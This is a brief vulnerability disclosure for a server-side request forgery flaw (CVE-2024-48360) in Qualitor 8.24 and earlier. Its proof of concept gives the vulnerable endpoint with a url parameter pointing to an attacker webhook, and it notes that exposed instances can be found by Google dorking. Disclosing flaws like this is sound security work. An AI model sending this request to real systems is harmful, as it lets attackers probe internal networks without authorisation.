Published on

CVE-2024-48360

Report
Date: 30/10/2024
Author: OpenXP Team
Software: Qualitor
Version: Qualitor <= 8.24
Type: Server-Side Request Forgery
OWASP TOP 10: A03:2021-Injection

References: https://portswigger.net/web-security/ssrf

Description

Qualitor is a platform for business process management, and this system is present in various companies in Brazil that can be identified simply by using Google dorking.

Our team identified a vulnerability in the application susceptible to SSRF, which allows enumerate internal systems/ports.

Proof of Concept (POC)

Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php.

To exploit, just send a request to host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK, you will receive the request from vulnerable server.

image

Researches

https://www.linkedin.com/in/xvinicius/